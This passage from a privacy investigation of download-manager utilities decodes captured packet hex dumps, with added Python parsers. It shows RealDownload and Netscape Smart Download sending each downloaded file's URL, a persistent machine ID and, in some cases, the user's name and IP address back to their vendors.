        These reports contained the complete Internet URL of the file being downloaded and were accompanied by an apparently unique "ID Tag" which was associated with each machine. To confirm this, I experimented with
        downloads from several different computers. In every case the "apparently unique ID" being sent out never changed on the same computer, and each computer has its own. 

        Netscape's Smart Download goes one step further by including the computer's IP address in a separate "cookie" header. This is troubling, since "cookie" headers tend to be left alone as they pass through proxies and
        anonymizers. This would thwart deliberate attempts at keeping the computer's IP address confidential. 

        When you consider that each user's computer is uniquely identified, and that reports are being sent back for every file downloaded -- and accompanied by a unique ID tag (and, in the case of Netscape, the machine's
        unique IP address) . . . 

                                                                    . . . It is NATURAL to wonder WHY
                                                                   this information is being transmitted,
                                                                 and to what end the data is being put!




        Dissecting RealDownload's Packet Traffic 

        After installing RealNetworks' RealDownload utility, I clicked on a web link to download the file "id.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out of my computer to
        one of Real's servers: 


                                                        MAC source address: 00-20-18-25-27-99
                                                        MAC dest address:   00-90-7F-01-21-E8
                                                        Frame type:         IP
                                                        Protocol:           TCP->HTTP
                                                        Source IP address:  207.71.92.206
                                                        Dest IP address:    207.188.30.49
                                                        Source port:        1107
                                                        Destination port:   80
                                                        SEQ:                3073973
                                                        ACK:                169605441
                                                        Packet size:        417

                                                        Packet data:
                                                        0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E.
                                                        0010:  01 93 1C 0A 00 00 40 06 43 58 CF 47 5C CE CF BC ......@.CX.G\...
                                                        0020:  1E 31 04 53 00 50 00 2E E7 B5 0A 1B F9 41 50 18 .1.S.P.......AP.
                                                        0030:  FF FF 44 5A 00 00 47 45 54 20 2F 73 61 32 2E 61 ..DZ..GET /sa2.a
                                                        0040:  73 70 3F 70 72 6F 64 75 63 74 3D 52 65 61 6C 44 sp?product=RealD
                                                        0050:  6F 77 6E 6C 6F 61 64 26 76 65 72 73 69 6F 6E 3D ownload&version=
                                                        0060:  34 2E 30 2E 30 2E 31 38 26 70 6C 61 74 66 6F 72 4.0.0.18&platfor
                                                        0070:  6D 3D 57 69 6E 39 38 26 65 76 65 6E 74 3D 64 6F m=Win98&event=do
                                                        0080:  77 6E 6C 6F 61 64 53 74 61 72 74 26 75 72 6C 3D wnloadStart&url=
                                                        0090:  68 74 74 70 25 33 41 25 32 46 25 32 46 67 72 63 http%3A%2F%2Fgrc
                                                        00A0:  2E 63 6F 6D 25 32 46 66 69 6C 65 73 25 32 46 69 .com%2Ffiles%2Fi
                                                        00B0:  64 2E 7A 69 70 26 72 65 66 75 72 6C 3D 67 72 63 d.zip&refurl=grc
                                                        00C0:  2E 63 6F 6D 26 66 69 6C 65 73 69 7A 65 3D 31 32 .com&filesize=12
                                                        00D0:  33 32 38 26 6D 69 6D 65 3D 61 70 70 6C 69 63 61 328&mime=applica
                                                        00E0:  74 69 6F 6E 25 32 46 7A 69 70 26 70 65 72 63 65 tion%2Fzip&perce
                                                        00F0:  6E 74 3D 30 26 64 6F 77 6E 6C 6F 61 64 69 64 3D nt=0&downloadid=
                                                        0100:  39 42 31 34 35 30 34 39 35 42 46 32 31 31 44 34 9B1450495BF211D4
                                                        0110:  41 30 32 35 30 30 32 30 31 38 32 35 32 37 39 39 A025002018252799
                                                        0120:  26 73 62 69 64 3D 26 73 70 6F 6E 73 6F 72 3D 72 &sbid=&sponsor=r
                                                        0130:  64 62 61 73 69 63 20 48 54 54 50 2F 31 2E 30 0D dbasic HTTP/1.0.
                                                        0140:  0A 48 6F 73 74 3A 20 73 61 2E 6E 65 74 7A 69 70 .Host: sa.netzip
                                                        0150:  2E 63 6F 6D 0D 0A 41 63 63 65 70 74 3A 20 2A 2F .com..Accept: */
                                                        0160:  2A 0D 0A 43 6F 6F 6B 69 65 3A 20 4C 61 73 74 49 *..Cookie: LastI
                                                        0170:  6E 66 6F 49 44 3D 31 30 30 32 3B 73 62 69 72 73 nfoID=1002;sbirs
                                                        0180:  68 61 72 65 3D 72 64 62 61 73 69 63 0D 0A 52 61 hare=rdbasic..Ra
                                                        0190:  6E 67 65 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 0D nge: bytes=0-...
                                                        01A0:  0A




        This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible. Breaking the block of ASCII text (over in the right hand column) into
        individual lines (at the '&' delimiter), and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" being given to
        RealNetworks' server, is: 

                                                                   GET /sa2.asp?
                                                                   product=RealDownload
                                                                   version=4.0.0.18
                                                                   platform=Win98
                                                                   event=downloadStart
                                                                   url=http://grc.com/files/id.zip
                                                                   refurl=grc.com
                                                                   filesize=12328
                                                                   mime=application/zip
                                                                   percent=0
                                                                   downloadid=9B1450495BF211D4A025002018252799
                                                                   sbid=
                                                                   sponsor=rdbasic
                                                                   HTTP/1.0



        The balance of the data transmitted consists of the additional information "parameters" shown below: 


                                                                    Host:   sa.netzip.com
                                                                    Accept: */*
                                                                    Cookie: LastInfoID=1002;sbirshare=rdbasic
                                                                    Range:  bytes=0-
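
        Added example, not part of the original article: the manual dissection just described, done in Python. It rebuilds the frame from the hex column of the first capture
        above, steps over the Ethernet, IP and TCP headers, and URL-decodes the query string of the report. The function names are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Hex dump of the first RealDownload report, copied from the capture on this page.
DUMP = r"""
0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E.
0010:  01 93 1C 0A 00 00 40 06 43 58 CF 47 5C CE CF BC ......@.CX.G\...
0020:  1E 31 04 53 00 50 00 2E E7 B5 0A 1B F9 41 50 18 .1.S.P.......AP.
0030:  FF FF 44 5A 00 00 47 45 54 20 2F 73 61 32 2E 61 ..DZ..GET /sa2.a
0040:  73 70 3F 70 72 6F 64 75 63 74 3D 52 65 61 6C 44 sp?product=RealD
0050:  6F 77 6E 6C 6F 61 64 26 76 65 72 73 69 6F 6E 3D ownload&version=
0060:  34 2E 30 2E 30 2E 31 38 26 70 6C 61 74 66 6F 72 4.0.0.18&platfor
0070:  6D 3D 57 69 6E 39 38 26 65 76 65 6E 74 3D 64 6F m=Win98&event=do
0080:  77 6E 6C 6F 61 64 53 74 61 72 74 26 75 72 6C 3D wnloadStart&url=
0090:  68 74 74 70 25 33 41 25 32 46 25 32 46 67 72 63 http%3A%2F%2Fgrc
00A0:  2E 63 6F 6D 25 32 46 66 69 6C 65 73 25 32 46 69 .com%2Ffiles%2Fi
00B0:  64 2E 7A 69 70 26 72 65 66 75 72 6C 3D 67 72 63 d.zip&refurl=grc
00C0:  2E 63 6F 6D 26 66 69 6C 65 73 69 7A 65 3D 31 32 .com&filesize=12
00D0:  33 32 38 26 6D 69 6D 65 3D 61 70 70 6C 69 63 61 328&mime=applica
00E0:  74 69 6F 6E 25 32 46 7A 69 70 26 70 65 72 63 65 tion%2Fzip&perce
00F0:  6E 74 3D 30 26 64 6F 77 6E 6C 6F 61 64 69 64 3D nt=0&downloadid=
0100:  39 42 31 34 35 30 34 39 35 42 46 32 31 31 44 34 9B1450495BF211D4
0110:  41 30 32 35 30 30 32 30 31 38 32 35 32 37 39 39 A025002018252799
0120:  26 73 62 69 64 3D 26 73 70 6F 6E 73 6F 72 3D 72 &sbid=&sponsor=r
0130:  64 62 61 73 69 63 20 48 54 54 50 2F 31 2E 30 0D dbasic HTTP/1.0.
0140:  0A 48 6F 73 74 3A 20 73 61 2E 6E 65 74 7A 69 70 .Host: sa.netzip
0150:  2E 63 6F 6D 0D 0A 41 63 63 65 70 74 3A 20 2A 2F .com..Accept: */
0160:  2A 0D 0A 43 6F 6F 6B 69 65 3A 20 4C 61 73 74 49 *..Cookie: LastI
0170:  6E 66 6F 49 44 3D 31 30 30 32 3B 73 62 69 72 73 nfoID=1002;sbirs
0180:  68 61 72 65 3D 72 64 62 61 73 69 63 0D 0A 52 61 hare=rdbasic..Ra
0190:  6E 67 65 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 0D nge: bytes=0-...
01A0:  0A
"""

# Offset, then at most 16 hex pairs; the ASCII column after them is ignored.
ROW = re.compile(r"^\s*([0-9A-F]{4}):\s+((?:[0-9A-F]{2} ){0,15}[0-9A-F]{2})")


def dump_to_bytes(dump):
    """Rebuild the raw frame, checking each row's offset against the bytes so far."""
    frame = bytearray()
    for line in dump.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(frame):
            raise ValueError(f"row {m.group(1)} is out of sequence")
        frame += bytes.fromhex(m.group(2))
    return bytes(frame)


def dissect(frame):
    """Walk Ethernet II -> IPv4 -> TCP and return addressing plus the payload."""
    if int.from_bytes(frame[12:14], "big") != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                      # IP header length in bytes
    if ip[9] != 6:
        raise ValueError("not TCP")
    tcp = ip[ihl:int.from_bytes(ip[2:4], "big")]  # trim to the IP total length
    data_offset = (tcp[12] >> 4) * 4              # TCP header length in bytes
    return {
        "src_mac": "-".join(f"{b:02X}" for b in frame[6:12]),
        "src_ip": ".".join(str(b) for b in ip[12:16]),
        "dst_ip": ".".join(str(b) for b in ip[16:20]),
        "src_port": int.from_bytes(tcp[0:2], "big"),
        "dst_port": int.from_bytes(tcp[2:4], "big"),
        "http": tcp[data_offset:].decode("latin-1"),
    }


def parse_report(http_text):
    """Split the HTTP request into decoded query parameters and headers."""
    head = http_text.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, rest = request_line.split(" ", 1)
    target, version = rest.rsplit(" ", 1)
    path, _, query = target.partition("?")
    return {
        "method": method, "path": path, "version": version,
        "params": dict(parse_qsl(query, keep_blank_values=True)),  # keeps "sbid="
        "headers": dict(h.split(": ", 1) for h in header_lines),
    }


if __name__ == "__main__":
    pkt = dissect(dump_to_bytes(DUMP))
    report = parse_report(pkt["http"])
    print(pkt["src_mac"], pkt["src_ip"], "->", pkt["dst_ip"], pkt["dst_port"])
    for key, value in report["params"].items():
        print(f"  {key}={value}")
    print(report["headers"])
```
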



        So, what does the data analysis show us? 

           The complete URL of the file I downloaded was sent to the receiving server: "url=http://grc.com/files/id.exe". The receiving server thus knows the location and full filename of the link I clicked on
           to download.

           My machine and I have been "tagged" by the compound "Key" of: 

                                                                            9B1450495BF211D4A025002018252799

           Which can be broken into its two component parts: 

                                                                           9B145049   5BF211D4A025002018252799

           The left chunk is a "counter" which appears to be incremented once for every file downloaded. I believe that this serves as a "session ID" to separate and identify individual downloads being
           conducted by a single computer. 

           The right-hand chunk is the "computer ID" which is, according to RealNetworks, based upon a Globally Unique ID (GUID) and is used to uniquely identify the computer into which RealDownload
           has been installed. 




                                                                     The Big Bad Boondoggle...




        When I was re-examining the RealDownload system on Monday, July 17th, something caught my eye that I had missed on the previous Friday: 

                                                                 My full name, and the private eMail alias I always use
                                                              for on-line purchases, was sent out of my computer to one
                                                           of Real's servers when I downloaded a file using RealDownload.

        RealNetworks' repetitious assertions that it is NOT POSSIBLE for them to associate our RealDownload mediated downloads with our actual identity, or that no "personally identifiable information" is
        transmitted without our informed consent, appear to be no more correct than their previous assertions about the lack of RealDownload's ID tagging. 

        Just so we're really clear here: I am NOT alleging that RealNetworks IS making this association. I have no evidence of that one way or the other. But I AM proving that they absolutely COULD if
        they chose to. Furthermore, for some reason which is not known to me, they have repeatedly stated that they CAN NOT. 


                                                        MAC source address: 00-20-18-25-27-99
                                                        MAC dest address:   00-90-7F-01-21-E8
                                                        Frame type:         IP
                                                        Protocol:           TCP->HTTP
                                                        Source IP address:  207.71.92.206
                                                        Dest IP address:    208.147.89.135
                                                        Source port:        1108
                                                        Destination port:   80
                                                        SEQ:                3074088
                                                        ACK:                3078494647
                                                        Packet size:        339

                                                        Packet data:
                                                        0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E.
                                                        0010:  01 45 1E 0A 00 00 40 06 05 79 CF 47 5C CE D0 93 .E....@..y.G\...
                                                        0020:  59 87 04 54 00 50 00 2E E8 28 B7 7E 19 B7 50 18 Y..T.P...(....P.
                                                        0030:  FF FF 05 FB 00 00 47 45 54 20 2F 61 64 73 2F 68 ......GET /ads/h
                                                        0040:  6F 75 73 65 5F 6A 75 6B 65 62 6F 78 31 2E 67 69 ouse_jukebox1.gi
                                                        0050:  66 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 f HTTP/1.1..Acce
                                                        0060:  70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
                                                        0070:  4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
                                                        0080:  0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
                                                        0090:  3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
                                                        00A0:  0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A .User-Agent: Moz
                                                        00B0:  69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 illa/4.0 (compat
                                                        00C0:  69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 3B 20 ible; MSIE 5.0; 
                                                        00D0:  57 69 6E 64 6F 77 73 20 39 38 3B 20 44 69 67 45 Windows 98; DigE
                                                        00E0:  78 74 29 0D 0A 43 6F 6F 6B 69 65 3A 20 52 4E 45 xt)..Cookie: RNE
                                                        00F0:  63 6F 6D 6D 3D 76 65 72 32 2E 30 7C ?? ?? ?? ?? comm=ver2.0|xxxx
                                                        0100:  ?? ?? ?? ?? ?? ?? ?? ?? ?? 7C 53 74 65 76 65 7C xxxxxxxxx|Steve|
                                                        0110:  47 69 62 73 6F 6E 7C 4F 46 46 7C 39 58 33 47 38 Gibson|OFF|9X3G8
                                                        0120:  0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 ..Connection: Ke
                                                        0130:  65 70 2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20 ep-Alive..Host: 
                                                        0140:  69 6D 61 67 65 73 2E 72 65 61 6C 2E 63 6F 6D 0D images.real.com.
                                                        0150:  0A 0D 0A                                        ...




        As before, we can easily break this rather intimidating looking hexadecimal data block into its much more easily readable header lines: 


                                                          GET /ads/house_jukebox1.gif HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
                                                          Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8
                                                          Connection: Keep-Alive
                                                          Host: images.real.com



        The "Cookie" header line (shown above) which is present in the outbound transmission to one of RealNetworks' servers - a transmission which was triggered by my use of RealDownload - not
        only demonstrates that RealNetworks has again misrepresented their capabilities, if not their actions and intentions, but also that they are careless in the extreme with their customers' personal and
        private data:

                                                           Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8

        Breaking this down with the benefit of what the RealNetworks technical manager told me: 

           I am guessing that the "RNEcomm=ver2.0" string stands for "Real Networks Electronic Commerce version 2.0".

           The string of 'xxxxxxxxxxxxxxxxxx' shown above was, when captured on its way out of my computer, my personal and private eMail address alias which would have been used during an online
           eCommerce purchase. I hope that you (the reader) will understand that I desire to protect its privacy here even if RealNetworks hasn't.

           The next two fields: "Steve" and "Gibson" are rather clear. If this isn't "personally identifiable information" being sent during the use of RealDownload, I can't imagine what would be.

           I can't guess what the last two fields: "OFF" and "9X3G8" might refer to. But logic would indicate that the "9X3G8" is an identifier which refers in some way to my past purchase of "Real
           Producer" which the RealNetworks technical manager concluded was the event which planted this very persistent cookie onto my computer for subsequent re-transmission at various odd (and in
           some cases potentially awkward - and certainly non-anonymous) moments . . . such as whenever using their supposedly anonymous RealDownload agent.


        You will notice that the server ("Host:") to which the offending Cookie was sent appears to be 'images.real.com'. This is a different server, at a different Internet IP address, from the one which
        received RealDownload's file download report. However, Internet server-clustering technologies, for aggregating data across disparate servers, are readily available, and we would expect a company
        like RealNetworks to be at the forefront of such bandwidth management technology. Thus the fact that the information was sent to different servers does not prevent its ready association. 

        Because this represents an extremely great concern for all of us, and especially for privacy advocates, I want to be very clear again that I am not alleging that such associating of these two
        separate communications IS being done, but only that RealNetworks' repeated assertion that it COULD NOT BE DONE, appears to be patently false. 




        Dissecting Smart Download's Packet Traffic 

        After installing Netscape's Smart Download utility, I clicked on a web link to download the file "tip.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out
        of my computer to one of Netscape's servers: 


                                                        MAC source address: 00-20-18-25-27-99
                                                        MAC dest address:   00-90-7F-01-21-E8
                                                        Frame type:         IP
                                                        Protocol:           TCP->HTTP
                                                        Source IP address:  207.71.92.206
                                                        Dest IP address:    207.200.75.206
                                                        Source port:        1041
                                                        Destination port:   80
                                                        SEQ:                330513
                                                        ACK:                750466305
                                                        Packet size:        450

                                                        Packet data:
                                                        0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E.
                                                        0010:  01 B4 9C 00 40 00 80 06 15 97 CF 47 5C CE CF C8 ....@......G\...
                                                        0020:  4B CE 04 11 00 50 00 05 0B 11 2C BB 35 01 50 18 K....P....,.5.P.
                                                        0030:  22 38 44 F5 00 00 47 45 54 20 2F 63 67 69 2D 62 "8D...GET /cgi-b
                                                        0040:  69 6E 2F 73 64 5F 73 65 72 76 65 72 2E 63 67 69 in/sd_server.cgi
                                                        0050:  3F 70 6C 61 74 66 6F 72 6D 3D 77 69 6E 39 38 26 ?platform=win98&
                                                        0060:  76 65 72 73 69 6F 6E 3D 31 2C 2B 31 2C 2B 30 2C version=1,+1,+0,
                                                        0070:  2B 36 36 26 75 72 6C 3D 68 74 74 70 25 33 41 25 +66&url=http%3A%
                                                        0080:  32 46 25 32 46 67 72 63 2E 63 6F 6D 25 32 46 66 2F%2Fgrc.com%2Ff
                                                        0090:  69 6C 65 73 25 32 46 74 69 70 2E 65 78 65 26 4B iles%2Ftip.exe&K
                                                        00A0:  65 79 3D 42 52 55 4E 4F 33 39 36 44 46 32 37 33 ey=BRUNO396DF273
                                                        00B0:  20 48 54 54 50 2F 31 2E 30 0D 0A 50 72 61 67 6D  HTTP/1.0..Pragm
                                                        00C0:  61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 43 6F 6E a: no-cache..Con
                                                        00D0:  6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C nection: Keep-Al
                                                        00E0:  69 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ive..User-Agent:
                                                        00F0:  20 4E 65 74 5A 69 70 2D 44 6F 77 6E 6C 6F 61 64  NetZip-Download
                                                        0100:  65 72 2F 31 2E 30 2E 36 32 20 28 57 69 6E 33 32 er/1.0.62 (Win32
                                                        0110:  3B 20 44 65 63 20 20 37 20 31 39 39 38 29 0D 0A ; Dec  7 1998)..
                                                        0120:  48 6F 73 74 3A 20 63 67 69 2E 6E 65 74 73 63 61 Host: cgi.netsca
                                                        0130:  70 65 2E 63 6F 6D 3A 38 30 0D 0A 52 61 6E 67 65 pe.com:80..Range
                                                        0140:  3A 20 62 79 74 65 73 3D 30 2D 0D 0A 41 63 63 65 : bytes=0-..Acce
                                                        0150:  70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
                                                        0160:  4C 61 6E 67 75 61 67 65 3A 20 65 6E 0D 0A 41 63 Language: en..Ac
                                                        0170:  63 65 70 74 2D 43 68 61 72 73 65 74 3A 20 69 73 cept-Charset: is
                                                        0180:  6F 2D 38 38 35 39 2D 31 2C 2A 2C 75 74 66 2D 38 o-8859-1,*,utf-8
                                                        0190:  0D 0A 43 6F 6F 6B 69 65 3A 20 55 49 44 43 3D 32 ..Cookie: UIDC=2
                                                        01A0:  30 37 2E 37 31 2E 39 32 2E 32 30 36 3A 30 39 36 07.71.92.206:096
                                                        01B0:  33 35 33 33 30 30 32 3A 32 33 38 32 31 31 0D 0A 3533002:238211..
                                                        01C0:  0D 0A




        This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible. Breaking the block of ASCII text (over in the right hand column) into
        individual lines, and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" given to the Netscape server, is: 

                                                                    GET /cgi-bin/sd_server.cgi?platform=win98
                                                                     &version=1,+1,+0,+66&url=http://grc.com/
                                                                     files/tip.exe&Key=BRUNO396DF273 HTTP/1.0

        This long line can then be further broken down into its various components: 

                                                                         GET /cgi-bin/sd_server.cgi
                                                                         platform=win98
                                                                         version=1,+1,+0,+66
                                                                         url=http://grc.com/files/tip.exe
                                                                         Key=BRUNO396DF273 
                                                                         HTTP/1.0



        The balance of the data transmitted consists of the additional information "parameters" shown below: 


                                                          Pragma:          no-cache
                                                          Connection:      Keep-Alive
                                                          User-Agent:      NetZip-Downloader/1.0.62(Win32;Dec 7 1998)
                                                          Host:            cgi.netscape.com:80
                                                          Range:           bytes=0-
                                                          Accept:          */*
                                                          Accept-Language: en
                                                          Accept-Charset:  iso-8859-1,*,utf-8
                                                          Cookie:          UIDC=207.71.92.206:0963533002:238211



        So, what does the data analysis show us? 

           The complete URL of the file I downloaded was sent to Netscape: "url=http://grc.com/files/tip.exe". Netscape thus knows what site I was visiting and what file(s) I clicked on to download.

           My machine and I have been "tagged" by the "Key" of: "BRUNO396DF273" 

           Interestingly, "Bruno" is the name of the machine I used for this testing. So, the machine's name is being sent as part of my "ID". Also, I performed this experiment SEVERAL TIMES, shutting
           down the machine and rebooting . . . and the key's value never changed. Thus, it is clearly serving as a "persistent tag" and is being used to uniquely identify me from one use of the download
           utility to the next.

           After seeing the "BRUNO396DF273" tag being sent, I searched the Windows Registry for that tag string. I found it in my machine's Registry at:

                                                                HKEY_LOCAL_MACHINE\Software\Nsda\1.1\Options\UserID

           This makes it pretty clear that the tag is, indeed, a persistent "UserID" (by their own label) which has been assigned to my machine for the purpose of long-term, unique, identification. 

           Note that any time Netscape (or anyone else) ever wants to, they could access that public registry key and immediately tie me, and this machine, to my entire past download history. 

           IMPORTANT!: Users of Netscape's Smart Download utility, who unwittingly joined Netscape's "NetCenter" system, are especially at risk of privacy violation because NetCenter members also
           have their NetCenter logon ID and their personal eMail address sent with each file download report! 

           So much for never including any "personally identifiable" information. This means that the user's NetCenter logon ID - many people simply use their names - and eMail address are both being
           transmitted along with the name of every file downloaded by Smart Download. 

           And finally ... check out the "Cookie" field that is being sent! (It is the last field of the last group above.) The glob at the end includes encoded date and time information, but immediately after
           the "UIDC=" is my machine's IP address!! So Netscape apparently thought that would be a good thing for them to have also. 

           Since it's in a "cookie" field, it will pass through "anonymizers", "proxies", and NAT routers, which would otherwise obscure the user's true IP address. In other words, since the machine's own IP
           address has been included in this "cookie", using the Internet through an "IP anonymizing service" will NOT prevent Netscape/AOL from learning the machine's TRUE IP. Netscape receives it
           directly from their software running in the user's computer. 
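
        The dissection walked through above (hex block, then header lines, then URL-decoded parameters, then the fields that identify the user) can be repeated mechanically when auditing what a utility sends home. The Python below is an added example, not part of the original article or of any vendor's code; it embeds the Smart Download packet bytes printed above, and the finding labels and the ID_PARAM_NAMES watchlist are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Packet bytes as printed in the article (ASCII column omitted; the parser ignores it anyway).
DUMP = """
0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00
0010:  01 B4 9C 00 40 00 80 06 15 97 CF 47 5C CE CF C8
0020:  4B CE 04 11 00 50 00 05 0B 11 2C BB 35 01 50 18
0030:  22 38 44 F5 00 00 47 45 54 20 2F 63 67 69 2D 62
0040:  69 6E 2F 73 64 5F 73 65 72 76 65 72 2E 63 67 69
0050:  3F 70 6C 61 74 66 6F 72 6D 3D 77 69 6E 39 38 26
0060:  76 65 72 73 69 6F 6E 3D 31 2C 2B 31 2C 2B 30 2C
0070:  2B 36 36 26 75 72 6C 3D 68 74 74 70 25 33 41 25
0080:  32 46 25 32 46 67 72 63 2E 63 6F 6D 25 32 46 66
0090:  69 6C 65 73 25 32 46 74 69 70 2E 65 78 65 26 4B
00A0:  65 79 3D 42 52 55 4E 4F 33 39 36 44 46 32 37 33
00B0:  20 48 54 54 50 2F 31 2E 30 0D 0A 50 72 61 67 6D
00C0:  61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 43 6F 6E
00D0:  6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C
00E0:  69 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A
00F0:  20 4E 65 74 5A 69 70 2D 44 6F 77 6E 6C 6F 61 64
0100:  65 72 2F 31 2E 30 2E 36 32 20 28 57 69 6E 33 32
0110:  3B 20 44 65 63 20 20 37 20 31 39 39 38 29 0D 0A
0120:  48 6F 73 74 3A 20 63 67 69 2E 6E 65 74 73 63 61
0130:  70 65 2E 63 6F 6D 3A 38 30 0D 0A 52 61 6E 67 65
0140:  3A 20 62 79 74 65 73 3D 30 2D 0D 0A 41 63 63 65
0150:  70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D
0160:  4C 61 6E 67 75 61 67 65 3A 20 65 6E 0D 0A 41 63
0170:  63 65 70 74 2D 43 68 61 72 73 65 74 3A 20 69 73
0180:  6F 2D 38 38 35 39 2D 31 2C 2A 2C 75 74 66 2D 38
0190:  0D 0A 43 6F 6F 6B 69 65 3A 20 55 49 44 43 3D 32
01A0:  30 37 2E 37 31 2E 39 32 2E 32 30 36 3A 30 39 36
01B0:  33 35 33 33 30 30 32 3A 32 33 38 32 31 31 0D 0A
01C0:  0D 0A
"""

# "offset:  up to 16 hex bytes"; anything after the 16th byte is the ASCII column.
HEX_LINE = re.compile(r"^\s*[0-9A-Fa-f]{4}:\s+((?:[0-9A-Fa-f]{2} ){0,15}[0-9A-Fa-f]{2})")
ID_PARAM_NAMES = {"key", "userid", "uid", "guid"}  # assumed watchlist, not from the article


def dump_to_bytes(dump):
    """Rebuild the raw frame from a sniffer-style hex listing."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1))
    return bytes(out)


def parse_frame(frame):
    """Ethernet II / IPv4 / TCP -> (src_ip, dst_ip, dst_port, tcp_payload)."""
    if frame[12:14] != b"\x08\x00" or frame[23] != 6:
        raise ValueError("not an IPv4/TCP frame")
    ihl = (frame[14] & 0x0F) * 4                      # IP header length in bytes
    total_len = int.from_bytes(frame[16:18], "big")   # IP datagram length
    src_ip = ".".join(map(str, frame[26:30]))
    dst_ip = ".".join(map(str, frame[30:34]))
    tcp = 14 + ihl
    dst_port = int.from_bytes(frame[tcp + 2:tcp + 4], "big")
    data_off = (frame[tcp + 12] >> 4) * 4             # TCP header length in bytes
    return src_ip, dst_ip, dst_port, frame[tcp + data_off:14 + total_len]


def parse_http(payload):
    """Split an HTTP request into path, URL-decoded query parameters and headers."""
    head = payload.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return parts.path, params, headers


def audit(dump):
    """Report which fields of the captured request identify the user or the download."""
    src_ip, dst_ip, dst_port, payload = parse_frame(dump_to_bytes(dump))
    path, params, headers = parse_http(payload)
    findings = []
    for name, value in params.items():
        if re.match(r"(?i)(https?|ftp)://", value):
            findings.append(("url-disclosed", name, value))
        # One packet cannot prove persistence; the article showed that by repeating the test.
        if name.lower() in ID_PARAM_NAMES:
            findings.append(("id-parameter", name, value))
    cookie = headers.get("cookie", "")
    # The machine's own address inside the cookie survives proxies and NAT.
    if src_ip in re.split(r"[=:;|\s]+", cookie):
        findings.append(("client-ip-in-cookie", "Cookie", cookie))
    return {"dst": f"{dst_ip}:{dst_port}", "host": headers.get("host"),
            "path": path, "findings": findings}


if __name__ == "__main__":
    for finding in audit(DUMP)["findings"]:
        print(finding)
```
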





        In Summary . . . 

                                                                             So what does it all mean?

        I am not a Netscape or RealNetworks programmer, so I can only go by the evidence presented through an analysis of the available data. I've read the "fine print" of their various license
        agreements carefully several times, and I've examined their online FAQ pages. There seems to be no question that by "agreeing" to the license, the user allows these companies to gather any sort of
        data they desire. The licenses seem strangely self-contradictory and quite unclear about what is being collected, stored, retained, compiled, used . . . and what is not, and why. 

          A close reading of the NetZip Download Demon license reveals an assertion interestingly absent from the otherwise very similar RealDownload license: 

                                                                    "No unique identifier or any personally identifiable
                                                                        information is sent with this information;"

          It would appear that someone at RealNetworks realized that NetZip's license had always been misleading its 14 million users, since a "unique identifier" was, in fact, always being sent along with
          the file download information. As a result, did RealNetworks remove the identifier?  No.  From their version of the NetZip license, RealNetworks simply removed the assertion that there was no
          identifier. 

          Yet these are the same people who are asking us to trust them with the fact that they could be recording the name and location of every single file we download through the Internet? . . . which
          is clearly tagged with our unique ID and with our machine's IP address?



        For most people, the main issue revolves around whether or not a report of every file downloaded with those utilities is transmitted back to their home base . . . and there's just no question any
        longer that unless deliberately disabled by the user, this is being actively done. If that bothers you, you may wish to immediately remove these downloading tools from your system. 

                                                           Any of these file download spies may be removed through Windows' standard
                                                           Add/Remove Programs feature located in the Windows Control Panel. You
                                                           will find them listed as "Netscape SmartDownload", "RealDownload", and
                                                           "NetZip Download Demon". 



